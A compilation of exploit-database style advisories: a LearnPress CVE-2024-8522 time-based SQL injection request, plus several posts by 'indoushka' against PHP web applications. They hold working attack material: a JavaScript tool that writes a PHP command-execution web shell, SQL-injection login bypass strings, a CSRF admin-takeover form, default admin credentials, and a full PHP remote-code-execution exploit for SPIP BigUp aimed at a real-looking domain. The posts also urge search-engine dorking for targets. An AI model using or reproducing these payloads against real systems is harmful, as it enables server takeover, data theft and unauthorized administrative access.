<pre><code># CVE-2024-8522<br />LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'<br /><br />## Stack<br /><br />```txt<br />class-lp-db.php:702, LP_Database->execute()<br />class-lp-course-db.php:564, LP_Course_DB->get_courses()<br />Courses.php:241, LearnPress\Models\Courses::get_courses()<br />class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()<br />class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()<br />class-wp-rest-server.php:1063, WP_REST_Server->dispatch()<br />class-wp-rest-server.php:439, WP_REST_Server->serve_request()<br />rest-api.php:420, rest_api_loaded()<br />class-wp-hook.php:324, WP_Hook->apply_filters()<br />class-wp-hook.php:348, WP_Hook->do_action()<br />plugin.php:565, do_action_ref_array()<br />class-wp.php:418, WP->parse_request()<br />class-wp.php:813, WP->main()<br />functions.php:1336, wp()<br />wp-blog-header.php:16, require()<br />index.php:17, {main}()<br />```<br /><br /><br />## <><br /><br />```txt<br />SELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10<br />```<br /><br /><br />## PoC<br /><br />```http<br />GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1<br />Host: localhost:8077<br />User-Agent: curl/7.81.0<br />Cookie: XDEBUG_SESSION=PHPSTORM<br />Accept: */*<br />```<br /><br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Prison Management System v1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to create a file and inject PHP code.<br /><br />[+] save payload as poc.html <br /><br />[+] In the line 13 , 'content[welcome]' name the file you want to create It will create a file with an HTML extension. <br /><br /> and in the same line, put the payload that suits you.<br /><br />[+] Set your target url<br /><br />[+] payload : <br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title> PHP code injection Tool</title><br /> <script><br /> async function sendRequest() {<br /> const url = document.getElementById('url').value;<br /> const postData = {<br /> 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`<br /> };<br /><br /> try {<br /> const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {<br /> method: 'POST',<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> body: new URLSearchParams(postData).toString()<br /> });<br /><br /> if (response.ok) {<br /> document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';<br /><br /> } else {<br /> document.getElementById('result').innerText = 'Error: ' + response.statusText;<br /> }<br /> } catch (error) {<br /> document.getElementById('result').innerText = 'Error making request: ' + error.message;<br /> }<br /> }<br /> </script><br /></head><br /><body><br /> <h1>Injection Tool</h1><br /> <form onsubmit="event.preventDefault(); sendRequest();"><br /> <label for="url">Enter URL:</label><br /> <input type="text" id="url" name="url" required><br /> <button type="submit">Submit</button><br /> </form><br /> <pre id="result"></pre><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PreSchool Enrollment System 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/pre-school-enrollment-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : USer & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/preschool/admin/index.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SchoolPlus v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 5. Set the target site link Save changes and apply . <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Security Gauard Hiring System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-security-guards-hiring-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/osghs/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Food Management System 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_onlinefood-php-zip.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/OnlineFood-PHP/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP BigUp 4.1.17 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.<br /> The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. <br /> By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. <br /> It allows unauthenticated users to execute arbitrary code remotely via the public interface. <br /><br /><br />[+] Line 143 : Set your target & payload .<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br />class indoushka {<br /> private $targetUri;<br /> private $formPage;<br /> private $payload;<br /><br /> public function __construct($targetUri, $formPage = 'auto', $payload) {<br /> $this->targetUri = $targetUri;<br /> $this->formPage = $formPage;<br /> $this->payload = $payload;<br /> }<br /><br /> public function check() {<br /> $spipVersion = $this->getSpipVersion();<br /> if (!$spipVersion) {<br /> return "Unable to determine the version of SPIP.";<br /> }<br /> echo "SPIP Version detected: " . $spipVersion . "\n";<br /><br /> $vulnerableRanges = [<br /> ['start' => '4.0.0', 'end' => '4.1.17'],<br /> ['start' => '4.2.0', 'end' => '4.2.15'],<br /> ['start' => '4.3.0', 'end' => '4.3.1']<br /> ];<br /><br /> $isVulnerable = false;<br /> foreach ($vulnerableRanges as $range) {<br /> if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {<br /> $isVulnerable = true;<br /> break;<br /> }<br /> }<br /><br /> if (!$isVulnerable) {<br /> return "The detected SPIP version ($spipVersion) is not vulnerable.";<br /> }<br /><br /> echo "SPIP version $spipVersion is vulnerable.\n";<br /> return "SPIP version $spipVersion is vulnerable.";<br /> }<br /><br /> private function getSpipVersion() {<br /> // This function should make an HTTP request to detect the SPIP version<br /> // Return the version or false if undetectable<br /> return '4.3.1'; // Example version, replace with actual logic<br /> }<br /><br /> private function getFormData() {<br /> $pages = ['login', 'spip_pass', 'contact'];<br /><br /> if ($this->formPage !== 'auto') {<br /> $pages = [$this->formPage];<br /> }<br /><br /> foreach ($pages as $page) {<br /> $url = $this->normalizeUri($page);<br /> $response = $this->sendRequest('GET', $url);<br /><br /> if ($response['status'] === 200) {<br /> libxml_use_internal_errors(true); // Prevent warnings from invalid HTML<br /> $doc = new DOMDocument();<br /> @$doc->loadHTML($response['body']);<br /> libxml_clear_errors();<br /><br /> $inputs = $doc->getElementsByTagName('input');<br /> if ($inputs->length > 1) {<br /> $action = $inputs->item(0)->getAttribute('value');<br /> $args = $inputs->item(1)->getAttribute('value');<br /> <br /> if ($action && $args) {<br /> echo "Found formulaire_action: $action\n";<br /> echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";<br /> return ['action' => $action, 'args' => $args];<br /> }<br /> }<br /> }<br /> }<br /><br /> return null;<br /> }<br /><br /> private function normalizeUri($page) {<br /> return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');<br /> }<br /><br /> private function sendRequest($method, $url, $data = null) {<br /> $ch = curl_init();<br /><br /> curl_setopt($ch, CURLOPT_URL, $url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> if ($method === 'POST' && $data) {<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)<br /> ]);<br /> }<br /><br /> $response = curl_exec($ch);<br /> $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);<br /><br /> curl_close($ch);<br /><br /> return ['status' => $httpCode, 'body' => $response];<br /> }<br /><br /> private function encodePayload() {<br /> return base64_encode($this->payload);<br /> }<br /><br /> public function exploit() {<br /> $formData = $this->getFormData();<br /> if (!$formData) {<br /> echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";<br /> return;<br /> }<br /><br /> echo "Preparing to send exploit payload to the target...\n";<br /><br /> $encodedPayload = $this->encodePayload();<br /> $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br /><br /> $postData = "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";<br /> $postData .= "--$boundary--\r\n";<br /><br /> $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);<br /> }<br /><br /> private function randomString($length = 8) {<br /> return bin2hex(random_bytes($length / 2));<br /> }<br />}<br /><br />// Usage example:<br />$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');<br />$exploit->check();<br />$exploit->exploit();<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Exam System 1.0 HTML Form found in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. <br /> Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. <br />An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). <br />This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION[auth])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />This vulnerability affects /exam/admin/quesadd.php. <br /><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Old Age Home Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/blms/banker/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Nipah virus (NiV) – Testing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/nipah-tms/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>